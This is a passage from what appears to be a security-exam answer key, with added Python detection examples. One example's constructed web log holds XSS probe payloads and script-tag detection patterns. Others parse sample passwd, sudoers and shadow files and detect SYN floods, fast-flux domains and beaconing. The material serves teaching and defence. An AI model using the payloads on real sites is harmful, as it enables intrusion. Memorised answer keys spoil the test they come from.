remote desktop port for Windows, makes it most likely that this is a Windows server. 


D. Adam’s Snort rule is looking for a specific behavior, in this case, web traffic to 
example.com’s download script. Rules looking for anomalies typically require an under- 
standing of “normal,” while trend-based rules need to track actions over time, and 
availability-based analysis monitors uptime. 
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C. Identity providers (IDPs) provide identities, make assertions about those identities to 
relying parties, and release information to relying parties about identity holders. Relying 
parties (RP), also known as service providers (SP), provide services to members of the fed- 
eration and should handle the data from both users and identity providers securely. The 
consumer is the end user of the federated services. 


B. While all of the techniques listed may be used to engage in credential theft, 
phishing is, by far, the most common way that user accounts become compromised in 
most organizations. 


C. In most organizations, Emily’s first action should be to verify that the system is not 
one that belongs to the organization by checking it against her organization’s asset inven- 
tory. If the system is a compromised system on the wrong network, she or her team will 
need to address it. In most jurisdictions, there is no requirement to notify third parties or 
law enforcement of outbound scans, and since the guest wireless is specifically noted as 
being unauthenticated, there will not be authentication logs to check. 


D. The strings command prints strings of printable characters in a file and does not 
show Linux permission information. The contents of the sudoers file, the output of the 
groups command, and the stat command can all provide useful information about user 
or file permissions. 


C. The scenario describes a dual-control (or two-person control) arrangement, where 
two individuals must collaborate to perform an action. This is distinct from separation 
of duties, where access controls are configured to prevent a single individual from accom- 
plishing two different actions that, when combined, represent a security issue. There is 
no indication that the company is performing privileged account monitoring or enforcing 
least privilege given in this scenario. 


A. The PCI DSS compensating control procedures do not require that compensating con- 
trols have a clearly defined audit mechanism, although this is good security practice. They 
do require that the control meet the intent and rigor of the original requirement, provide 
a similar level of defense as the original requirement, and be above and beyond other 
requirements. 


B. This error indicates that the digital certificate presented by the server is not valid. Lou 
should replace the certificate with a certificate from a trusted CA to correct the issue. 


D. Data retention policies specify the appropriate life cycle for different types of informa- 
tion. In this example, a data retention policy would likely have instructed the organization 
to dispose of the unneeded records, limiting the number that were compromised. A data 
ownership policy describes who bears responsibility for data and is less likely to have a 
direct impact on this incident. An acceptable use policy could limit the misuse of data by 
insiders, but there is no indication that this was an insider attack. An account manage- 
ment policy may be useful in pruning unused accounts and managing privileges, but there 
is no indicator that these issues contributed to the impact of this incident. 


A. Incident data should be retained as necessary regardless of media life span. Retention 
is often driven by the likelihood of civil or criminal action, as well as by organizational 
standards. 
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D. An outage is an availability issue, data exposures are confidentiality issues, and the 
integrity of the email was compromised when it was changed. 


B. The best way to resolve this issue would be to upgrade to OpenSSH 6.4, as stated 
in the solution section of the report. Disabling the use of AES-GCM is an acceptable 
workaround, but upgrading to a more current version of OpenSSH is likely to address 
additional security issues not described in this particular vulnerability report. There is no 
indication that an operating system upgrade would correct the problem. The vulnerability 
report states that there is no malware associated with this vulnerability, so antivirus sig- 
nature updates would not correct it. 


A. The firewall rules continue to allow access to the compromised systems, while prevent- 
ing them from attacking other systems. This is an example of segmentation. Segmentation 
via VLANs, firewall rules, or other logical methods can help to protect other systems, 
while allowing continued live analysis. 


C. Jennifer can use this information to help build her baseline for response times for the 
AWS server. A 200 ms response time for a remotely hosted server is well within a reason- 
able range. There is nothing in this chart that indicates an issue. 


A. Scalpel is a carving tool designed to identify files in a partition or volume that is miss- 
ing its index or file allocation table. DBAN is a wiping tool, parted is a partition editor, 
and dd is used for disk duplication. You may encounter questions about programs you are 
unfamiliar with on the exam. Here, you can eliminate tools that you are familiar with like 
DBAN, parted, or dd and take a reasonable guess based on that knowledge. 


A. Ben’s best option is to look for a hibernation file or core dump that may contain evi- 
dence of the memory-resident malware. Once a system has been shut down, a memory- 
resident malware package will be gone until the system is re-infected, making reviews 
of the registry, INDX files, and volume shadow copies unlikely to be useful. Since the 
system was shut down, he won’t get useful memory forensics from a tool like the Volatility 
Framework unless the machine is re-infected. 


A. The <SCRIPT> tag is used to mark the beginning of a code element, and its use is indic- 
ative of a cross-site scripting attack. <XSS> is not a valid HTML tag. The <B> (for bold 
text) and <EM> (for italics) tags are commonly found in normal HTML input. 
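The detection described above, applied to web-server access logs, as an added example that is not part of the original book: it URL-decodes each query parameter, looks for script tags, inline event handlers, and javascript: URIs, and shows the output encoding that neutralizes such input. The log lines are constructed in an Apache combined-style format using documentation addresses.

```python
"""Scan access log entries for script injection attempts in query parameters,
and show the output encoding that neutralizes them.

Added example, not from the book. ACCESS_LOG is a constructed sample.
"""
import html
import re
from typing import List, Tuple
from urllib.parse import parse_qsl, urlsplit

ACCESS_LOG = """\
203.0.113.5 - - [14/Nov/2023:10:00:01 +0000] "GET /search?q=shoes HTTP/1.1" 200 512
203.0.113.9 - - [14/Nov/2023:10:00:02 +0000] "GET /search?q=%3CSCRIPT%3Ealert(1)%3C/SCRIPT%3E HTTP/1.1" 200 612
203.0.113.9 - - [14/Nov/2023:10:00:03 +0000] "GET /profile?name=%3Cb%3EBob%3C/b%3E HTTP/1.1" 200 300
203.0.113.12 - - [14/Nov/2023:10:00:04 +0000] "GET /search?q=%3Cimg%20src=x%20onerror=alert(1)%3E HTTP/1.1" 200 612
"""

# client ident user [time] "METHOD url PROTO" status ...
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Applied to the URL-decoded parameter value, case-insensitively. <B> and <EM>
# style formatting tags deliberately do not match.
PATTERNS = [
    ("script_tag", re.compile(r"<\s*/?\s*script\b", re.I)),
    ("event_handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("javascript_uri", re.compile(r"javascript\s*:", re.I)),
]


def classify_value(value: str) -> List[str]:
    """Names of the patterns a decoded parameter value matches (empty if benign)."""
    return [name for name, pat in PATTERNS if pat.search(value)]


def scan_log(text: str) -> List[Tuple[str, str, str, str]]:
    """Return (client, path, parameter, reason) for every suspicious parameter."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("url"))
        # parse_qsl percent-decodes values, so %3CSCRIPT%3E becomes <SCRIPT>
        for param, value in parse_qsl(parts.query, keep_blank_values=True):
            for reason in classify_value(value):
                hits.append((m.group("client"), parts.path, param, reason))
    return hits


def render_safe(value: str) -> str:
    """Output-encode user input before placing it in HTML text or attribute context."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for hit in scan_log(ACCESS_LOG):
        print(hit)
    print(render_safe("<SCRIPT>alert(1)</SCRIPT>"))
```

Signature matching on logs finds the obvious probes; the real fix is the encoding in render_safe, applied at output time, since detection regexes are easy to evade with alternative encodings.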


C. An intrusion prevention system (or other device or software with similar capabilities) 
to block port scans based on behavior is the most effective method listed. Not registering 
systems in DNS won’t stop IP-based scans, and port scans will still succeed on the ports 
that firewalls allow through. Port security is a network switch-based technology designed 
to limit which systems can use a physical network port. 


B. NIST’s functional impact categories range from none to high, but this event fits the 
description for a medium event; the organization has lost the ability to provide a critical 
service to a subset of system users. If the entire network had gone down, he would have 
rated the event as a high-impact event, whereas if a single switch or the network had a 
slowdown, he would have categorized it as low. 
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B. Operating system fingerprinting relies on the differences between how each operat- 
ing system (and sometimes OS versions) handles and sets various TCP/IP fields, including 
initial packet size, initial TTL, window size, maximum segment size, and the don’t frag- 
ment, sackOK, and nop flags. 
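A passive fingerprinter built on the fields named above, as an added example that is not from the book or from nmap or p0f: it normalizes the observed TTL back to a likely initial value, compares the SYN's window, DF bit, SACK option, and option layout against a deliberately small hypothetical signature table, and estimates hop count. Real tools carry thousands of signatures and more fields; the sample packets are constructed values.

```python
"""Passive OS fingerprinting from TCP SYN characteristics.

Added example, not from the book. SIGNATURES is a hypothetical, simplified table.
"""
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass(frozen=True)
class SynFeatures:
    ttl: int          # IP TTL as seen on the wire (already decremented by each hop)
    window: int       # TCP window size advertised in the SYN
    df: bool          # IP "don't fragment" flag set
    sack_ok: bool     # SACK-permitted option present
    opt_layout: str   # TCP option order, e.g. "mss,nop,wscale,nop,nop,sackok"


# Hypothetical signatures: (initial TTL, window, DF, SACK-permitted, option layout).
SIGNATURES = {
    "Linux 3.x/4.x": (64, 29200, True, True, "mss,sackok,ts,nop,wscale"),
    "Windows 10":    (128, 64240, True, True, "mss,nop,wscale,nop,nop,sackok"),
    "FreeBSD 12":    (64, 65535, True, True, "mss,nop,wscale,sackok,ts"),
}

COMMON_INITIAL_TTLS = (32, 64, 128, 255)


def infer_initial_ttl(observed_ttl: int) -> int:
    """Round the observed TTL up to the nearest common initial value."""
    for init in COMMON_INITIAL_TTLS:
        if observed_ttl <= init:
            return init
    return 255


def hop_estimate(observed_ttl: int) -> int:
    """Approximate number of routers between the source and the sensor."""
    return infer_initial_ttl(observed_ttl) - observed_ttl


def score(f: SynFeatures) -> Dict[str, int]:
    """Number of matching fields (out of 5) for each signature."""
    observed = (infer_initial_ttl(f.ttl), f.window, f.df, f.sack_ok, f.opt_layout)
    return {name: sum(a == b for a, b in zip(observed, sig)) for name, sig in SIGNATURES.items()}


def fingerprint(f: SynFeatures, min_score: int = 5) -> Optional[str]:
    """Best-scoring OS name if it reaches min_score, otherwise None (unknown stack)."""
    scores = score(f)
    best = max(scores, key=scores.get)
    return best if scores[best] >= min_score else None


# Constructed samples: TTLs of 52 and 117 imply 12 and 11 hops from the sensor.
LINUX_SYN = SynFeatures(ttl=52, window=29200, df=True, sack_ok=True,
                        opt_layout="mss,sackok,ts,nop,wscale")
WINDOWS_SYN = SynFeatures(ttl=117, window=64240, df=True, sack_ok=True,
                          opt_layout="mss,nop,wscale,nop,nop,sackok")
# An odd stack (window 8192, no DF, no SACK) that matches nothing well.
UNKNOWN_SYN = SynFeatures(ttl=60, window=8192, df=False, sack_ok=False, opt_layout="mss")

if __name__ == "__main__":
    for label, f in (("linux", LINUX_SYN), ("windows", WINDOWS_SYN), ("unknown", UNKNOWN_SYN)):
        print(label, fingerprint(f), f"{hop_estimate(f.ttl)} hops", score(f))
```

Requiring a full five-field match keeps the false positive rate down; a partial score is still worth reporting, since stacks behind NAT or middleboxes that rewrite TCP options often match only on TTL and window.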


B. Management Information Bases (MIBs) provide monitoring groups to get information 
about networks, including flow-based information, statistics, history, alarms, and events. 


D. The order of volatility of common storage locations is as follows: 

1. CPU cache, registers, running processes, and RAM 
2. Network traffic 
3. Disk drives (both spinning magnetic and solid-state) 
4. Backups, printouts, and optical media (including DVD-ROMs and CDs) 

Thus, the least volatile storage listed is the DVD-ROM. 


A. This vulnerability states that there is a missing patch to the Windows operating 
system. In a bare-metal hypervisor, the only place that Windows could be running is as a 
guest operating system. Therefore, this is the location where Jerry must apply a patch. 


C. The hallmark of a Tier 3 risk management program is that there is an organization-wide 
approach to managing cybersecurity risk. In a Tier 4 program, there is an organization- 
wide approach to managing cybersecurity risk that uses risk-informed policies, processes, 
and procedures to address potential cybersecurity events. 


D. The repeated SYN packets are likely a SYN flood that attempts to use up resources 
on the target system. A failed three-way handshake might initially appear similar but will 
typically not show this volume of attempts. A link failure would not show traffic from a 
remote system, and a DDoS would involve more than one system sending traffic. 
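The distinction drawn above between a SYN flood, a failed handshake, and a distributed attack, as an added example that is not from the book: it reads a constructed packet summary log (format assumed: epoch source:port > dest:port flags), counts SYNs and completing ACKs per client, and classifies each source by volume and by whether any handshake ever completed.

```python
"""Classify SYN activity toward a server from a packet summary log.

Added example, not from the book. Log format and SAMPLE_LOG are constructed:
one normal handshake, one retried (failed) handshake, and 300 SYNs in
under a second from a single source with no ACKs.
"""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

SERVER = "192.0.2.10"

SAMPLE_LOG = """\
1700000000.001 203.0.113.7:40001 > 192.0.2.10:443 S
1700000000.002 192.0.2.10:443 > 203.0.113.7:40001 SA
1700000000.003 203.0.113.7:40001 > 192.0.2.10:443 A
1700000001.000 198.51.100.5:51000 > 192.0.2.10:443 S
1700000001.001 192.0.2.10:443 > 198.51.100.5:51000 SA
1700000004.000 198.51.100.5:51000 > 192.0.2.10:443 S
""" + "".join(
    f"1700000010.{i:03d} 203.0.113.99:{20000 + i} > 192.0.2.10:443 S\n" for i in range(300)
)

LINE_RE = re.compile(r"^(\d+\.\d+) (\S+):(\d+) > (\S+):(\d+) (\w+)$")

Packet = Tuple[float, str, int, str, int, str]


def parse(log: str) -> List[Packet]:
    packets = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, src, sport, dst, dport, flags = m.groups()
            packets.append((float(ts), src, int(sport), dst, int(dport), flags))
    return packets


def per_source_stats(packets: List[Packet], server: str) -> Dict[str, dict]:
    """Count SYNs and final ACKs sent by each client to the server, with time span."""
    stats = defaultdict(lambda: {"syn": 0, "ack": 0, "first": None, "last": None})
    for ts, src, _sport, dst, _dport, flags in packets:
        if dst != server:          # only the client -> server direction
            continue
        s = stats[src]
        if flags == "S":
            s["syn"] += 1
        elif flags == "A":
            s["ack"] += 1
        s["first"] = ts if s["first"] is None else min(s["first"], ts)
        s["last"] = ts if s["last"] is None else max(s["last"], ts)
    return stats


def classify(stats: Dict[str, dict], flood_threshold: int = 100, window: float = 10.0) -> Dict[str, str]:
    verdicts = {}
    for src, s in stats.items():
        span = s["last"] - s["first"]
        if s["syn"] >= flood_threshold and s["ack"] == 0 and span <= window:
            verdicts[src] = "syn_flood"            # many half-open attempts, never completed
        elif s["syn"] and s["ack"] == 0:
            verdicts[src] = "failed_handshake"     # a handful of retries, never completed
        else:
            verdicts[src] = "normal"
    return verdicts


def analyze(log: str, server: str = SERVER) -> dict:
    verdicts = classify(per_source_stats(parse(log), server))
    flooders = sorted(src for src, v in verdicts.items() if v == "syn_flood")
    kind = "distributed_syn_flood" if len(flooders) > 1 else "syn_flood" if flooders else "no_flood"
    return {"kind": kind, "flooders": flooders, "verdicts": verdicts}


if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

The flood threshold and window are tuning knobs; in a real capture you would also check whether the flooding source addresses are spoofed, which is typical for SYN floods and makes per-source blocking ineffective.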


D. Oracle databases default to TCP port 1521. Traffic from the “outside” system is being 
denied when it attempts to access an internal system via that port. 


D. The ATA Secure Erase command wipes all of an SSD, including host-protected area 
partitions and remapped spare blocks. Degaussing is used for magnetic media such as 
tapes and is not effective on SSDs, while zero writing or using a pseudorandom num- 
ber generator to fill the drive will not overwrite data in the host-protected area or spare 
blocks, which are used to wear level most SSDs. 


D. Data classification is a set of labels applied to information based upon its degree of 
sensitivity and/or criticality. It would be the most appropriate choice in this scenario. Data 
retention requirements dictate the length of time that an organization should maintain 
copies of records. Data remanence is an issue where information thought to be deleted 
may still exist on systems. Data privacy may contribute to data classification but does not 
encompass the entire field of data sensitivity and criticality in the same manner as data 
classification. For example, a system may process proprietary business information that 
would be very highly classified and require frequent vulnerability scanning. Unless that 
system also processed personally identifiable information, it would not trigger scans under 
a system based solely upon data privacy. 
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D. The output that Bob sees is from a password-cracking tool. He can tell this by reading 
the header and realizing that the file contains unhashed passwords. Of the tools listed, 
only Cain & Abel and John the Ripper are password-cracking utilities. Metasploit is an 
exploitation framework, while ftk is a forensics toolkit. Cain & Abel is a Windows-based 
tool, and this appears to be command-line output. Therefore, the output is from John the 
Ripper, a command-line password-cracking utility available for all major platforms. 


C. Nmap is an open source port scanning tool and does not have web application vulner- 
ability scanning capability. Acunetix and Nikto are dedicated-purpose web application 
vulnerability scanners. QualysGuard is a more general vulnerability scanning tool, but it 
does have web application scanning capabilities. 


B. PCI DSS only requires scanning on at least a quarterly basis and after any significant 
changes. Weekly scanning is a best practice but is not required by the standard. Peter must 
hire an approved scanning vendor to perform the required quarterly external scans but 
may conduct the internal scans himself. All systems in the cardholder data environment, 
including both the website and point-of-sale terminals, must be scanned. 


A. The vulnerability description mentions that this is a cross-site scripting (XSS) vulner- 
ability. Normally, XSS vulnerabilities are resolved by performing proper input validation 
in the web application code. However, in this particular case, the XSS vulnerability exists 
within the Microsoft IIS server itself and not in a web application. Therefore, it requires a 
patch from Microsoft to correct it. 


C. Fast flux DNS networks use many IP addresses behind one (or a few) fully qualified 
domain names. Logging DNS server queries and reviewing them for hosts that look up the 
DNS entries associated with the command-and-control network can quickly identify com- 
promised systems. 

Unfortunately, antivirus software is typically not updated quickly enough to immediately 
detect new malware. Since the fast flux DNS command and control relies on frequent 
changes to the C&C hosts, IP addresses change quickly, making them an unreliable detec- 
tion method. Finally, reviewing email to see who received the malware-laden message is 
useful but won’t indicate whether the malware was successful in infecting a system 
without additional data. 
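The DNS log review described above, as an added example that is not from the book: it reads constructed DNS query logs (format assumed: timestamp client qname qtype answer ttl), flags domains that return many distinct addresses with short TTLs, adds any known C2 names, and reports which internal hosts resolved them. A legitimate CDN that also rotates addresses is included to show the allowlist and thresholds that keep it from being flagged.

```python
"""Identify fast-flux C2 domains and the internal hosts that resolved them.

Added example, not from the book. Log format and records are constructed;
update.example-c2.net is a hypothetical fast-flux domain, cdn.example.org a
hypothetical CDN that rotates addresses more slowly.
"""
import statistics
from collections import defaultdict
from typing import Dict, FrozenSet, List, NamedTuple, Set


class DnsRecord(NamedTuple):
    ts: str
    client: str
    qname: str
    qtype: str
    answer: str
    ttl: int


SAMPLE_LOG = """\
2023-11-14T10:00:01Z 10.0.0.5 update.example-c2.net A 198.51.100.21 60
2023-11-14T10:01:03Z 10.0.0.5 update.example-c2.net A 203.0.113.77 60
2023-11-14T10:02:05Z 10.0.0.5 update.example-c2.net A 192.0.2.130 60
2023-11-14T10:03:07Z 10.0.0.5 update.example-c2.net A 198.51.100.9 60
2023-11-14T10:03:09Z 10.0.0.9 update.example-c2.net A 203.0.113.14 60
2023-11-14T10:04:11Z 10.0.0.9 update.example-c2.net A 192.0.2.201 60
2023-11-14T10:00:02Z 10.0.0.7 www.example.com A 192.0.2.1 3600
2023-11-14T10:05:02Z 10.0.0.7 www.example.com A 192.0.2.1 3600
2023-11-14T10:00:04Z 10.0.0.8 cdn.example.org A 198.51.100.50 300
2023-11-14T10:01:04Z 10.0.0.8 cdn.example.org A 198.51.100.51 300
2023-11-14T10:02:04Z 10.0.0.8 cdn.example.org A 198.51.100.52 300
"""


def parse_dns_log(text: str) -> List[DnsRecord]:
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 6:
            continue
        ts, client, qname, qtype, answer, ttl = parts
        records.append(DnsRecord(ts, client, qname.lower().rstrip("."), qtype, answer, int(ttl)))
    return records


def fast_flux_domains(records: List[DnsRecord], min_ips: int = 5, max_ttl: int = 120,
                      allowlist: FrozenSet[str] = frozenset()) -> Dict[str, dict]:
    """Domains answering with >= min_ips distinct A records at a median TTL <= max_ttl."""
    ips: Dict[str, Set[str]] = defaultdict(set)
    ttls: Dict[str, List[int]] = defaultdict(list)
    for r in records:
        if r.qtype == "A":
            ips[r.qname].add(r.answer)
            ttls[r.qname].append(r.ttl)
    flagged = {}
    for name, addrs in ips.items():
        median_ttl = statistics.median(ttls[name])
        if name not in allowlist and len(addrs) >= min_ips and median_ttl <= max_ttl:
            flagged[name] = {"distinct_ips": len(addrs), "median_ttl": median_ttl}
    return flagged


def clients_resolving(records: List[DnsRecord], domains: Set[str]) -> Dict[str, Set[str]]:
    """Internal hosts that queried any of the given domains, with what they looked up."""
    hits: Dict[str, Set[str]] = defaultdict(set)
    for r in records:
        if r.qname in domains:
            hits[r.client].add(r.qname)
    return dict(hits)


def find_compromised(text: str, known_c2: FrozenSet[str] = frozenset(), **thresholds) -> Dict[str, Set[str]]:
    """Combine heuristic fast-flux detection with a list of known C2 names."""
    records = parse_dns_log(text)
    suspects = set(fast_flux_domains(records, **thresholds)) | {d.lower() for d in known_c2}
    return clients_resolving(records, suspects)


if __name__ == "__main__":
    print(fast_flux_domains(parse_dns_log(SAMPLE_LOG)))
    print(find_compromised(SAMPLE_LOG))
```

The heuristic alone is noisy (CDNs, large mail providers, and round-robin load balancers all rotate addresses), so in practice the known_c2 list from threat intelligence carries most of the weight and the thresholds are tuned per environment.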


A. The -O flag (capital letter O) enables operating system detection for nmap. 


A. Mika is using both a knowledge-based factor in the form of her password and some- 
thing she has in the form of the token. Possession of the token is the “something she has.” 


B. The most appropriate step for Jose to take is to discuss his opinion with his manager 
and see whether the manager is willing to change the guidelines. As a security profes- 
sional, it is Jose’s ethical responsibility to share his opinion with his manager. It would 
not be appropriate for Jose to act against his manager’s wishes. Jose should also not ask to 
speak with his manager’s supervisor until he has had an opportunity to discuss the issue 
thoroughly with his manager. 
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A. Susan’s best option is to use an automated testing sandbox that analyzes the applica- 
tions for malicious or questionable behavior. While this may not catch every instance 

of malicious software, the only other viable option is decompiling the applications and 
analyzing the code, which would be incredibly time-consuming. Since she doesn’t have the 
source code, Fagan inspection won’t work (and would take a long time too), and running 
a honeypot is used to understand hacker techniques, not to directly analyze application 
code. 


B. Firewall rules are an example of a logical control because they are technical controls 
that enforce confidentiality, integrity, and availability in the digital space. Locks and keys 
and security guards are examples of physical controls. Background checks are an example 
of an administrative control. 


C. A data loss prevention system may be able to intercept and block unencrypted sensi- 
tive information leaving the web server, but it does not apply cryptography to web com- 
munications. Transport layer security (TLS) is the most direct approach to meeting Chris’ 
requirement, as it encrypts all communication to and from the web server. Virtual private 
networks (VPNs) may also be used to encrypt network traffic, adding a layer of security. 
Full disk encryption (FDE) may also be used to protect information stored on the server in 
the event the disk is stolen. 


C. Network Access Control (NAC) can combine user or system authentication with 
client-based or clientless configuration and profiling capabilities to ensure that systems are 
properly patched and configured and are in a desired security state. Whitelisting is used 
to allow specific systems or applications to work, port security is a MAC address filtering 
capability, and EAP is an authentication protocol. 


D. The best option presented is for Chris to remove the drive and purge the data from it. 
Destroying the drive, unless specified as allowable in the lease, is likely to cause contrac- 
tual issues. Reformatting a drive that contains highly sensitive data will not remove the 
data, so neither reformatting option is useful here. In a best-case scenario, Chris will work 
to ensure that future devices either have built-in encryption that allows an easy secure 
wipe mode or a dedicated secure wipe mode, or he will work to ensure that the next 
lease includes a drive destruction clause. 


A. The most reasonable response is for Rhonda to adjust the scanning parameters to 
avoid conflicts with peak business periods. She could ask for additional network band- 
width, but this is likely an unnecessary expense. Adjusting the business requirements is 
not a reasonable response as security objectives should be designed to add security in a 
way that allows the business to operate efficiently, not the other way around. Ignoring the 
request would be very harmful to the business relationship. 


B. When restoring from a backup after a compromise, it is important to ensure that the 
flaw that allowed attackers in is patched or otherwise remediated. In many environments, 
backups can be restored to a protected location where they can be patched, validated, and 
tested before they are restored to service. 
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D. Recurring beaconing behavior with a changing set of systems is a common char- 
acteristic of more advanced malware packages. It is most likely that this system was 
compromised with malware that deleted itself when its ability to check in with a 
command-and-control system was removed, thus preventing the malware from being 
captured and analyzed by incident responders. 
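The beaconing behavior described above, as an added example that is not from the book: it reads a constructed connection log (format assumed: epoch_seconds src dst dport), computes inter-arrival intervals per source/destination pair, flags pairs whose intervals are nearly constant, and then groups flagged pairs by source so a beacon that moves between command-and-control hosts still shows up as one infected system.

```python
"""Detect periodic check-ins (beaconing) in a connection log.

Added example, not from the book. CONN_LOG is constructed: 10.0.0.5 checks
in every ~300 s, first with 203.0.113.50 and then with 203.0.113.51, while
10.0.0.7 talks to 192.0.2.80 at irregular, human-looking intervals.
"""
import statistics
from collections import defaultdict
from typing import Dict, List, Tuple

CONN_LOG = """\
1700000000 10.0.0.5 203.0.113.50 443
1700000300 10.0.0.5 203.0.113.50 443
1700000605 10.0.0.5 203.0.113.50 443
1700000903 10.0.0.5 203.0.113.50 443
1700001205 10.0.0.5 203.0.113.50 443
1700001506 10.0.0.5 203.0.113.50 443
1700001805 10.0.0.5 203.0.113.50 443
1700002108 10.0.0.5 203.0.113.50 443
1700002405 10.0.0.5 203.0.113.50 443
1700002705 10.0.0.5 203.0.113.50 443
1700003009 10.0.0.5 203.0.113.50 443
1700003309 10.0.0.5 203.0.113.51 443
1700003610 10.0.0.5 203.0.113.51 443
1700003908 10.0.0.5 203.0.113.51 443
1700004210 10.0.0.5 203.0.113.51 443
1700004509 10.0.0.5 203.0.113.51 443
1700000000 10.0.0.7 192.0.2.80 443
1700000005 10.0.0.7 192.0.2.80 443
1700000125 10.0.0.7 192.0.2.80 443
1700000127 10.0.0.7 192.0.2.80 443
1700001027 10.0.0.7 192.0.2.80 443
1700001060 10.0.0.7 192.0.2.80 443
1700001067 10.0.0.7 192.0.2.80 443
"""

Key = Tuple[str, str, int]  # (src, dst, dport)


def parse_conn_log(text: str) -> List[Tuple[int, str, str, int]]:
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            ts, src, dst, dport = parts
            records.append((int(ts), src, dst, int(dport)))
    return records


def detect_beacons(records, min_conns: int = 5, max_cv: float = 0.1) -> Dict[Key, dict]:
    """Flag pairs whose inter-connection intervals have a low coefficient of variation.

    Real implants add jitter, so a tolerance (max_cv) is used rather than
    requiring identical intervals.
    """
    times: Dict[Key, List[int]] = defaultdict(list)
    for ts, src, dst, dport in records:
        times[(src, dst, dport)].append(ts)
    beacons = {}
    for key, ts_list in times.items():
        if len(ts_list) < min_conns:
            continue
        ts_list.sort()
        gaps = [b - a for a, b in zip(ts_list, ts_list[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            beacons[key] = {"count": len(ts_list), "period_s": round(mean), "cv": round(cv, 4)}
    return beacons


def beacons_by_source(beacons: Dict[Key, dict]) -> Dict[str, List[str]]:
    """Group flagged destinations per internal host: the rotating C2 set for that host."""
    out: Dict[str, set] = defaultdict(set)
    for (src, dst, _dport) in beacons:
        out[src].add(dst)
    return {src: sorted(dsts) for src, dsts in out.items()}


if __name__ == "__main__":
    found = detect_beacons(parse_conn_log(CONN_LOG))
    for key, info in found.items():
        print(key, info)
    print(beacons_by_source(found))
```

Software update checks and monitoring agents also beacon, so the grouped output is a triage list, not a verdict; the period, the destination set, and whether the destinations resolve to known infrastructure decide the call.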


A. ISO 27001 provides guidance on information security management systems. ISO 9000 
applies to quality management. ISO 11120 applies to gas cylinders. ISO 23270 applies to 
programming languages. 


B. /etc/shadow contains password hashes but does not provide information about 
privileges. Unlike /etc/passwd, it does not contain user ID or group ID information and 
instead contains only the username, the hashed password, and password aging fields. 
/etc/passwd, /etc/sudoers, and /etc/group may all contain evidence of the 
www user receiving additional privileges. 
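The review described above, as an added example that is not from the book: it parses constructed copies of /etc/passwd, /etc/group, /etc/sudoers and /etc/shadow, reports the www user's UID, group memberships and applicable sudo rules, and shows that the shadow entry carries no privilege information at all. The file contents are samples; a real sudoers may also include /etc/sudoers.d/*, which this does not follow.

```python
"""Gather evidence of extra privileges for a Linux user from the standard files.

Added example, not from the book. PASSWD, GROUP, SUDOERS and SHADOW are
constructed samples; the www user has been added to sudo and docker and
given a NOPASSWD rule.
"""
from typing import Dict, List

PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
"""

GROUP = """\
root:x:0:
sudo:x:27:alice,www
www-data:x:33:
docker:x:998:www
"""

SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults env_reset
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
www ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart apache2
"""

SHADOW = """\
root:$6$saltsalt$hashhash:19000:0:99999:7:::
www:*:19000:0:99999:7:::
"""

# Groups that grant root or root-equivalent access on most distributions.
PRIVILEGED_GROUPS = {"root", "sudo", "wheel", "adm", "docker"}


def parse_passwd(text: str) -> Dict[str, dict]:
    users = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, uid, gid, _gecos, home, shell = line.split(":", 6)
        users[name] = {"uid": int(uid), "gid": int(gid), "home": home, "shell": shell}
    return users


def parse_group(text: str) -> Dict[str, dict]:
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":", 3)
        groups[name] = {"gid": int(gid), "members": [m for m in members.split(",") if m]}
    return groups


def groups_for(user: str, passwd: Dict[str, dict], groups: Dict[str, dict]) -> List[str]:
    """Primary group (from passwd GID) plus supplementary groups (from group members)."""
    primary = {g for g, info in groups.items() if info["gid"] == passwd[user]["gid"]}
    supplementary = {g for g, info in groups.items() if user in info["members"]}
    return sorted(primary | supplementary)


def sudoers_rules_for(user: str, user_groups: List[str], sudoers_text: str) -> List[str]:
    """Rules whose subject is the user or %group for one of the user's groups."""
    rules = []
    for line in sudoers_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        subject = line.split()[0]
        if subject == user or (subject.startswith("%") and subject[1:] in user_groups):
            rules.append(line)
    return rules


def shadow_fields(user: str, shadow_text: str) -> Dict[str, str]:
    """The shadow entry: hash and aging only, no UID, GID or group data."""
    keys = ["name", "hash", "last_change", "min_days", "max_days", "warn", "inactive", "expire", "reserved"]
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if fields and fields[0] == user:
            return dict(zip(keys, fields))
    return {}


def privilege_report(user: str, passwd_text: str = PASSWD, group_text: str = GROUP,
                     sudoers_text: str = SUDOERS) -> dict:
    passwd, groups = parse_passwd(passwd_text), parse_group(group_text)
    if user not in passwd:
        return {}
    user_groups = groups_for(user, passwd, groups)
    return {
        "uid": passwd[user]["uid"],
        "uid_zero": passwd[user]["uid"] == 0,
        "shell": passwd[user]["shell"],
        "groups": user_groups,
        "privileged_groups": sorted(set(user_groups) & PRIVILEGED_GROUPS),
        "sudo_rules": sudoers_rules_for(user, user_groups, sudoers_text),
    }


if __name__ == "__main__":
    print(privilege_report("www"))
    print(shadow_fields("www", SHADOW))
```

A service account with a nologin shell that nonetheless sits in sudo and docker and has a NOPASSWD rule is exactly the pattern worth escalating; also check the file modification times, since a recently changed /etc/group or /etc/sudoers is itself evidence.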


A. Logging of application and server activity may provide valuable evidence during a 
